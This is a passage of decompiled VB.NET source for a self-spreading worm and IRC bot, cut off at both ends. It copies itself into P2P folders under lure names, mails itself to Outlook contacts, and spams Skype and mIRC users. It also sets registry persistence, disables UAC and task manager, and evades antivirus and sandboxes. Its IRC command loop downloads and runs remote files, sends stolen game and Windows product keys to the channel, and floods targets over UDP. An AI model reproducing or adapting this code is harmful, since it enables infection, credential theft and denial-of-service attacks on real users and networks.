writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\grokster\my grokster\virusgen.exe" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\icq\shared files\C&C_all.exe" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\KaZaa Lite\My Shared Folder\best_porn.scr" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\KaZaa\My Shared Folder\virtual_girls_all.scr" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\Morpheus\my shared folder\icq_unlimited.exe" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\StreamCast\Morpheus\my shared folder\windows_vista.exe" & ChrW(65533))
writer4.WriteLine("for /f %%b in (%windir%\system32\13l.dll) do (" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\BearShare\Shared\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\eDonkey2000\incoming\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\eMule\Incoming\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\gnucleus\downloads\incoming\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\grokster\my grokster\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\icq\shared files\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\KaZaa Lite\My Shared Folder\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\KaZaa\My Shared Folder\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\Morpheus\my shared folder\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\StreamCast\Morpheus\my shared folder\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe C:\My Downloads\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\direct connect\received files\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\gnucleus\downloads\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\grokster\my shared folder\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\KMD\my shared folder\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\limeWire\shared\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\StreamCast\Morpheus\my shared folder\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\XPCode\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe C:\Inetpub\ftproot\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe C:\appserv\www\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe C:\%programfiles%\appserv\www\%%b" & ChrW(65533))
Dim str1 As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)
writer4.WriteLine(("dir /s /ad /b" & ChrW(65533) & str1 & "* >>%windir%\system32\tomp.txt" & ChrW(65533)))
writer4.WriteLine("for %%o in (%windir%\system32\tomp.txt) do (" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %%o\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %%o\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %%o\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %%o\%%b" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %%o\%%b" & ChrW(65533))
writer4.WriteLine(")" & ChrW(65533))
writer4.WriteLine(")" & ChrW(65533))
writer4.WriteLine(("copy C:\WINDOWS\system32\dllcache\recycled.exe \\192.168.1.%bloo%\C$\" & ChrW(65533) & text3 & ".exe" & ChrW(65533)))
writer4.WriteLine(("copy C:\WINDOWS\system32\dllcache\recycled.exe \\192.168.%num%.%bloo%\C$\funny.scr" & ChrW(65533) & text3 & ".exe" & ChrW(65533)))
writer4.WriteLine(("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\BearShare\Shared\ea-keygen.exe" & ChrW(65533) & text3 & ".exe" & ChrW(65533)))
writer4.WriteLine(("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\eDonkey2000\incoming\britney_spears_naked.scr" & ChrW(65533) & text3 & ".exe" & ChrW(65533)))
writer4.WriteLine(("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\eMule\Incoming\battlefield2-3.exe" & ChrW(65533) & text3 & ".exe" & ChrW(65533)))
writer4.WriteLine(("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\gnucleus\downloads\incoming\wormgenerator.exe" & ChrW(65533) & text3 & ".exe" & ChrW(65533)))
writer4.WriteLine(("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\grokster\my grokster\virusgen.exe" & ChrW(65533) & text3 & ".exe" & ChrW(65533)))
writer4.WriteLine(("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\icq\shared files\C&C_all.exe" & ChrW(65533) & text3 & ".exe" & ChrW(65533)))
writer4.WriteLine(("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\KaZaa Lite\My Shared Folder\best_porn.scr" & ChrW(65533) & text3 & ".exe" & ChrW(65533)))
writer4.WriteLine(("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\KaZaa\My Shared Folder\virtual_girls_all.scr" & ChrW(65533) & text3 & ".exe" & ChrW(65533)))
writer4.WriteLine(("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\Morpheus\my shared folder\icq_unlimited.exe" & ChrW(65533) & text3 & ".exe" & ChrW(65533)))
writer4.WriteLine(("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\StreamCast\Morpheus\my shared folder\windows_vista.exe" & ChrW(65533) & text3 & ".exe" & ChrW(65533)))
writer4.WriteLine("reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Firewall"" /v ""ImagePath"" /t ""REG_EXPAND_SZ"" /d ""C:\windows\system32\drivers\svchost.exe"" /f" & ChrW(65533))
writer4.WriteLine("reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Firewall"" /v ""DisplayName"" /d ""Default Windows Firewall"" /f" & ChrW(65533))
writer4.WriteLine("reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Firewall"" /v ""ObjectName"" /d ""LocalSystem"" /f" & ChrW(65533))
writer4.WriteLine("reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Firewall"" /v ""Start"" /t REG_DWORD /d ""2"" /f" & ChrW(65533))
writer4.WriteLine("reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Firewall"" /v ""ErrorControl"" /t REG_DWORD /d ""0"" /f" & ChrW(65533))
writer4.WriteLine("reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Firewall"" /v ""Type"" /t REG_DWORD /d ""110"" /f" & ChrW(65533))
writer4.WriteLine(("reg add ""HKEY_CURRENT_USER\Software\Patchou\Messenger Plus! Live\GlobalSettings\Scripts\MSN PLUS"" /v background /d " & ChrW(65533) & Me.link & "/f" & ChrW(65533)))
writer4.WriteLine(("reg add ""HKEY_CURRENT_USER\Identities\Software\Microsoft\Outlook Express\5.0\signatures"" /v ""Default Signature"" /d " & ChrW(65533) & Me.link & "/f" & ChrW(65533)))
writer4.WriteLine("if exist ""%programfiles%\AutoIt3\Include\*.au3"" (" & ChrW(65533))
writer4.WriteLine(("echo InetGet(""" & ChrW(65533) & Me.link & """, ""%windir%\system32\sys.bat"", 1, 0) >>%programfiles%\Autoit3\Include\*.au3" & ChrW(65533)))
writer4.WriteLine("echo run(""%winidr%\system32\sys.bat"") >>%programfiles%\Autoit3\Include\*.au3" & ChrW(65533))
writer4.WriteLine(")" & ChrW(65533))
writer4.WriteLine("echo open 192.168.1.%bloo% >%windir%\ftp" & ChrW(65533))
writer4.WriteLine("anonymous >>%windir%\ftp" & ChrW(65533))
writer4.WriteLine("password >>%windir%\ftp" & ChrW(65533))
writer4.WriteLine("put C:\WINDOWS\system32\dllcache\doc.pif >>%windir%\ftp" & ChrW(65533))
writer4.WriteLine("echo by >>%windir%\ftp" & ChrW(65533))
writer4.WriteLine("ftp -s:%windir%\ftp" & ChrW(65533))
writer4.WriteLine("del C:\start.exe" & ChrW(65533))
writer4.Close
Process.Start("C:\windows\system32\launch.vbs" & ChrW(65533))
Dim writer2 As New StreamWriter(New FileStream("C:\windows\system32\s4c.vbs" & ChrW(65533), FileMode.Create, FileAccess.Write))
writer2.BaseStream.Seek(CLng(0), SeekOrigin.End)
writer2.WriteLine("on error resume next" & ChrW(65533))
writer2.WriteLine("set Fruxr = WScript.CreateObject(""Skype4COM.Skype"", ""Skype_"")" & ChrW(65533))
writer2.WriteLine("Fruxr.Client.Start()" & ChrW(65533))
writer2.WriteLine("Fruxr.Attach()" & ChrW(65533))
writer2.WriteLine("For Each KZN In Fruxr.Friends " & ChrW(65533))
writer2.WriteLine(("Fruxr.SendMessage KZN.handle,""lol me hot " & ChrW(65533) & Me.link & """" & ChrW(65533)))
writer2.WriteLine("next" & ChrW(65533))
writer2.WriteLine("Dim x" & ChrW(65533))
writer2.WriteLine("On Error Resume Next" & ChrW(65533))
writer2.WriteLine("fso = ""Scripting.FileSystem.Object""" & ChrW(65533))
writer2.WriteLine("so = CreateObject(fso)" & ChrW(65533))
writer2.WriteLine("ol = CreateObject(""Outlook.Application"")" & ChrW(65533))
writer2.WriteLine("out = WScript.CreateObject(""Outlook.Application"")" & ChrW(65533))
writer2.WriteLine("mapi = out.GetNameSpace(""MAPI"")" & ChrW(65533))
writer2.WriteLine("a = mapi.AddressLists(1)" & ChrW(65533))
writer2.WriteLine("For x = 1 To a.AddressEntries.Count" & ChrW(65533))
writer2.WriteLine("Mail = ol.CreateItem(0)" & ChrW(65533))
writer2.WriteLine("Mail.to = ol.GetNameSpace(""MAPI"").AddressLists(1).AddressEntries(x)" & ChrW(65533))
writer2.WriteLine("Mail.Subject = ""Hi""" & ChrW(65533))
writer2.WriteLine("Mail.Body = ""Hello , i sent you the document , i had to correct, it was really nice but many failures""" & ChrW(65533))
writer2.WriteLine("Mail.Attachments.Add(""C:\WINDOWS\system32\dllcache\doc.pif"")" & ChrW(65533))
writer2.WriteLine("Mail.Send()" & ChrW(65533))
writer2.WriteLine("Next" & ChrW(65533))
writer2.WriteLine("ol.Quit()" & ChrW(65533))
writer2.WriteLine("Dim mirc" & ChrW(65533))
writer2.WriteLine("fso = CreateObject(""Scripting.FileSystemObject"")" & ChrW(65533))
writer2.WriteLine(("mirc = fso.CreateTextFile(""" & ChrW(65533) & Me.ProgrammFiles & "\mirc\script.ini"")" & ChrW(65533)))
writer2.WriteLine("fso.CopyFile Wscript.ScriptFullName, ""C:\WINDOWS\system32\dllcache\myporn.scr"", True " & ChrW(65533))
writer2.WriteLine("mirc.WriteLine ""[script]""" & ChrW(65533))
writer2.WriteLine("mirc.WriteLine ""n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick C:\WINDOWS\system32\dllcache\doc.pif } """ & ChrW(65533))
writer2.WriteLine("mirc.Close" & ChrW(65533))
writer2.Close
Process.Start("C:\windows\system32\s4c.vbs" & ChrW(65533))
MyProject.Computer.get_Registry.SetValue("HKEY_LOCAL_MACHINE\Software\Microsoft\MessengerService\Policies" & ChrW(65533), "IMWarning" & ChrW(65533), ("(M)Warning: The person who you are talking to is infected with a virus. Send him the removal tool that can be found in" & ChrW(65533) & Me.link))
MyProject.Computer.get_Registry.SetValue("HKEY_CLASSES_ROOT\exefile\shell\open\command" & ChrW(65533), "@" & ChrW(65533), "C:\windows\system32\drivers\svchost.exe ""\%1\"" %*" & ChrW(65533))
MyProject.Computer.get_Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" & ChrW(65533), "Hidden" & ChrW(65533), "2" & ChrW(65533))
MyProject.Computer.get_Registry.SetValue("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz" & ChrW(65533), "content url" & ChrW(65533), Me.link)
MyProject.Computer.get_Registry.SetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" & ChrW(65533), "EnableLUA" & ChrW(65533), "0" & ChrW(65533))
MyProject.Computer.get_Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" & ChrW(65533), "HideFileExt" & ChrW(65533), "1" & ChrW(65533))
Me.P2Pspread
Me.MSN_Share_drop
Try
Me.msn_spread
Catch exception33 As Exception
ProjectData.SetProjectError(exception33)
ProjectData.ClearProjectError
End Try
Me.killall
Antis.antiKAV
Antis.AntiWireShark
Antis.antiSandboxie
Antis.antiAnubis
Antis.antiAnubis2
Antis.AntiVirtualBox
Antis.AntiVmWare
Antis.AntiVirtualPC
Try
If Not File.Exists((Path.GetTempPath & "win_update.exe" & ChrW(65533))) Then
File.Copy(Assembly.GetExecutingAssembly.Location, (Path.GetTempPath & "win_update.exe" & ChrW(65533)))
End If
Catch exception34 As Exception
ProjectData.SetProjectError(exception34)
Dim exception1 As Exception = exception34
ProjectData.ClearProjectError
End Try
Try
MyProject.Computer.get_Registry.SetValue("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" & ChrW(65533), "Shell" & ChrW(65533), "explorer.exe, C:\windows\system32\drivers\svchost.exe" & ChrW(65533))
Catch exception35 As Exception
ProjectData.SetProjectError(exception35)
Dim exception2 As Exception = exception35
ProjectData.ClearProjectError
End Try
Try
MyProject.Computer.get_Registry.SetValue("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" & ChrW(65533), "shell" & ChrW(65533), "explorer.exe, C:\windows\system32\drivers\svchost.exe" & ChrW(65533))
MyProject.Computer.get_Registry.SetValue("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" & ChrW(65533), "Userinit" & ChrW(65533), ("C:\WINDOWS\SYSTEM32\Userinit.exe," & ChrW(65533) & Path.GetTempPath & "win_update.exe" & ChrW(65533)))
goto Label_1708
Catch exception36 As Exception
ProjectData.SetProjectError(exception36)
Dim exception3 As Exception = exception36
ProjectData.ClearProjectError
goto Label_1708
End Try
Try
Catch exception37 As Exception
ProjectData.SetProjectError(exception37)
Dim exception4 As Exception = exception37
ProjectData.ClearProjectError
End Try
Label_1708:
Try
Console.ReadLine
ircbot.irc = New TcpClient(ircbot.SERVER, ircbot.PORT)
ircbot.IRCstream = ircbot.irc.GetStream
ircbot.IRCreader = New StreamReader(ircbot.IRCstream)
ircbot.IRCwriter = New StreamWriter(ircbot.IRCstream)
ircbot.IRCwriter.WriteLine("USER go go gadget go :gay" & ChrW(65533))
ircbot.IRCwriter.Flush
ircbot.IRCwriter.WriteLine(("NICK " & ChrW(65533) & ircbot.NICK))
ircbot.IRCwriter.Flush
Do While True
Do While (Not ircbot.Inline(Of String)(CType(ircbot.inputLine, T), CType(ircbot.IRCreader.ReadLine, T)) Is Nothing)
Dim separator As Char()
Dim num4 As Integer
Dim objArray1 As Object()
Dim objArray2 As Object()
Dim objArray3 As Object()
Dim flagArray1 As Boolean()
Dim objArray4 As Object()
Dim values As String()
Dim num5 As Integer
Dim objArray5 As Object()
Dim objArray6 As Object()
If ircbot.inputLine.Contains("PING :" & ChrW(65533)) Then
Dim startIndex As Integer = ircbot.inputLine.IndexOf("PING :" & ChrW(65533))
ircbot.IRCwriter.WriteLine(("PONG :" & ChrW(65533) & New String(Conversions.ToCharArrayRankOne(New String(Conversions.ToCharArrayRankOne(ircbot.inputLine.Substring(startIndex))).Replace("PING :" & ChrW(65533), String.Empty)))))
ircbot.IRCwriter.Flush
End If
ircbot.IRCwriter.WriteLine(("JOIN " & ChrW(65533) & ircbot.CHANNEL))
ircbot.IRCwriter.Flush
If ircbot.inputLine.Contains("!dl" & ChrW(65533)) Then
Try
separator = New Char() { " "c }
Me.bla = ircbot.inputLine.Split(separator)
Dim num2 As Integer = ircbot.inputLine.IndexOf("http://" & ChrW(65533))
Dim text6 As String = ircbot.inputLine.Substring(num2)
objArray2 = New Object(2 - 1) {}
objArray1 = New Object(1 - 1) {}
num4 = 1
objArray1(0) = num4
objArray2(0) = RuntimeHelpers.GetObjectValue(NewLateBinding.LateIndexGet(Me.bla, objArray1, Nothing))
objArray2(1) = (Path.GetTempPath & ircbot.Rand1)
objArray3 = objArray2
flagArray1 = New Boolean() { True, False }
NewLateBinding.LateCall(New WebClient, Nothing, "DownloadFile" & ChrW(65533), objArray3, Nothing, Nothing, flagArray1, True)
If flagArray1(0) Then
objArray4 = New Object() { num4, RuntimeHelpers.GetObjectValue(objArray3(0)) }
NewLateBinding.LateIndexSetComplex(Me.bla, objArray4, Nothing, True, False)
End If
Process.Start(New ProcessStartInfo((Path.GetTempPath & ircbot.Rand1)))
objArray4 = New Object() { 1 }
ircbot.IRCwriter.WriteLine(Operators.AddObject(Operators.AddObject(Operators.ConcatenateObject(Operators.ConcatenateObject(((((("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL) & " :" & ChrW(65533)) & " " & ChrW(65533)) & ChrW(3) & ChrW(65533)) & "9 downloaded " & ChrW(65533)), NewLateBinding.LateIndexGet(Me.bla, objArray4, Nothing)), " and executed in : " & ChrW(65533)), Path.GetTempPath), ircbot.Rand1))
ircbot.IRCwriter.Flush
Catch exception38 As Exception
ProjectData.SetProjectError(exception38)
Dim exception5 As Exception = exception38
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & writer1.ToString))
ircbot.IRCwriter.Flush
ProjectData.ClearProjectError
End Try
End If
If ircbot.inputLine.EndsWith("!infos" & ChrW(65533)) Then
Try
values = New String() { "PRIVMSG " & ChrW(65533), ircbot.CHANNEL, " : " & ChrW(3) & "9 My OS is : " & ChrW(65533), Environment.OSVersion.ToString, ", My Username is : " & ChrW(65533), Environment.UserName.ToString, " , and my uptime in seconds is : " & ChrW(65533), Environment.Version.ToString, "my network IP:" & ChrW(65533), Me.nameho, "my version:" & ChrW(65533), Me.version }
ircbot.IRCwriter.WriteLine(String.Concat(values))
ircbot.IRCwriter.Flush
Catch exception39 As Exception
ProjectData.SetProjectError(exception39)
Dim exception6 As Exception = exception39
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & writer1.ToString))
ircbot.IRCwriter.Flush
ProjectData.ClearProjectError
End Try
End If
If ircbot.inputLine.EndsWith("!p2p" & ChrW(65533)) Then
Try
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "Started p2p spreading routine" & ChrW(65533)))
Me.P2Pspread
ircbot.IRCwriter.Flush
Catch exception40 As Exception
ProjectData.SetProjectError(exception40)
Dim exception7 As Exception = exception40
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & writer1.ToString))
ircbot.IRCwriter.Flush
ProjectData.ClearProjectError
End Try
End If
If ircbot.inputLine.EndsWith("!msnshare" & ChrW(65533)) Then
Try
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "Started msn share spreading routine" & ChrW(65533)))
Me.MSN_Share_drop
ircbot.IRCwriter.Flush
Catch exception41 As Exception
ProjectData.SetProjectError(exception41)
Dim exception8 As Exception = exception41
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & writer1.ToString))
ircbot.IRCwriter.Flush
ProjectData.ClearProjectError
End Try
End If
If ircbot.inputLine.EndsWith("!msn" & ChrW(65533)) Then
Try
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "Started msn spreading routine" & ChrW(65533)))
Try
Me.msn_spread
Catch exception42 As Exception
ProjectData.SetProjectError(exception42)
ProjectData.ClearProjectError
End Try
ircbot.IRCwriter.Flush
Catch exception43 As Exception
ProjectData.SetProjectError(exception43)
Dim exception9 As Exception = exception43
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & writer1.ToString))
ircbot.IRCwriter.Flush
ProjectData.ClearProjectError
End Try
End If
If ircbot.inputLine.EndsWith("!killav" & ChrW(65533)) Then
Try
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "killes AV succesfully" & ChrW(65533)))
If Antis.antiKAV Then
ProjectData.EndApp
End If
Antis.AntiWireShark
If Antis.antiSandboxie Then
ProjectData.EndApp
End If
If Antis.antiAnubis Then
ProjectData.EndApp
End If
If Antis.antiAnubis2 Then
ProjectData.EndApp
End If
If Antis.AntiVirtualBox Then
ProjectData.EndApp
End If
If Antis.AntiVmWare Then
ProjectData.EndApp
End If
If Antis.AntiVirtualPC Then
ProjectData.EndApp
End If
Me.killall
ircbot.IRCwriter.Flush
Catch exception44 As Exception
ProjectData.SetProjectError(exception44)
Dim exception10 As Exception = exception44
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & writer1.ToString))
ircbot.IRCwriter.Flush
ProjectData.ClearProjectError
End Try
End If
If ircbot.inputLine.EndsWith("!remove" & ChrW(65533)) Then
Try
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "removed" & ChrW(65533)))
Dim writer8 As New StreamWriter(New FileStream("C:\windows\system32\rem.bat" & ChrW(65533), FileMode.Create, FileAccess.Write))
writer8.BaseStream.Seek(CLng(0), SeekOrigin.End)
writer8.WriteLine("@echo off & break off" & ChrW(65533))
writer8.WriteLine("del C:\WINDOWS\system32\dllcache\recycled.exe /f" & ChrW(65533))
writer8.WriteLine("del C:\WINDOWS\system32\drivers\svchost.exe /f" & ChrW(65533))
writer8.Close
Process.Start("C:\windows\system32\rem.bat" & ChrW(65533))
Catch exception45 As Exception
ProjectData.SetProjectError(exception45)
Dim exception11 As Exception = exception45
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & writer1.ToString))
ircbot.IRCwriter.Flush
ProjectData.ClearProjectError
End Try
End If
If ircbot.inputLine.EndsWith("!cdkeys" & ChrW(65533)) Then
Try
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "sims3 Key:" & ChrW(65533) & Me.sims3))
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "cod key:" & ChrW(65533) & Me.COD))
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "cod2 key:" & ChrW(65533) & Me.COD2))
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "cod4 key:" & ChrW(65533) & Me.COD4))
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "cod5 key:" & ChrW(65533) & Me.COD5))
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "HL key:" & ChrW(65533) & Me.HL))
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "cs key:" & ChrW(65533) & Me.CS))
values = New String() { "PRIVMSG " & ChrW(65533), ircbot.CHANNEL, " : " & ChrW(3) & "Windows + Office key:" & ChrW(65533), Me.Win, " the key is probably base64 encoded use this for decoding http://www.motobit.com/util/base64-decoder-encoder.asp" & ChrW(65533) }
ircbot.IRCwriter.WriteLine(String.Concat(values))
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "battlefron2 Key:" & ChrW(65533) & Me.bf2))
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "battlefield2 key:" & ChrW(65533) & Me.baf2))
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "company of heroes key:" & ChrW(65533) & Me.coh))
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "mount and blade key:" & ChrW(65533) & Me.mb))
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "supreme commander key:" & ChrW(65533) & Me.supc))
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "HL key:" & ChrW(65533) & Me.HL))
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "battlefield 1942 key:" & ChrW(65533) & Me.bf42))
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "Command and Conquer Generals key:" & ChrW(65533) & Me.cacg))
Catch exception46 As Exception
ProjectData.SetProjectError(exception46)
Dim exception12 As Exception = exception46
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & writer1.ToString))
ircbot.IRCwriter.Flush
ProjectData.ClearProjectError
End Try
End If
If ircbot.inputLine.EndsWith("!limit" & ChrW(65533)) Then
Try
Interaction.Shell("REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f" & ChrW(65533), 1, False, -1)
Interaction.Shell("REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f" & ChrW(65533), 1, False, -1)
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "succeeded" & ChrW(65533)))
Catch exception47 As Exception
ProjectData.SetProjectError(exception47)
Dim exception13 As Exception = exception47
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & writer1.ToString))
ircbot.IRCwriter.Flush
ProjectData.ClearProjectError
End Try
End If
If ircbot.inputLine.Contains("!udp" & ChrW(65533)) Then
Try
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "UDP flooding now" & ChrW(65533)))
Do While True
separator = New Char() { " "c }
Me.bla = ircbot.inputLine.Split(separator)
Dim client2 As New UdpClient
Dim dgram As Byte() = New Byte(0 - 1) {}
objArray4 = New Object() { 1 }
Dim addr As IPAddress = IPAddress.Parse(Conversions.ToString(NewLateBinding.LateIndexGet(Me.bla, objArray4, Nothing)))
objArray4 = New Object() { 2 }
client2.Connect(addr, Conversions.ToInteger(NewLateBinding.LateIndexGet(Me.bla, objArray4, Nothing)))
dgram = Encoding.ASCII.GetBytes("BLAAAAAAAAAAAAAAA!/asldifrhaslkdfhaseoirfhasdhfjasdzf483975634597328528934tzheufgz34975638q9ruweirf " & ChrW(8203) & " hsdkjvnwu45z6384975weuirhjsfndjvzw438563q84ruwajfjsadfhdfhgq349875q390ruf)=/()%&" & ChrW(167) & "%&%" & ChrW(65533))
client2.Send(dgram, dgram.Length)
Loop
Catch exception48 As Exception
ProjectData.SetProjectError(exception48)
Dim exception14 As Exception = exception48
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & writer1.ToString))
ircbot.IRCwriter.Flush
ProjectData.ClearProjectError
End Try
End If
If ircbot.inputLine.Contains("!port" & ChrW(65533)) Then
Try
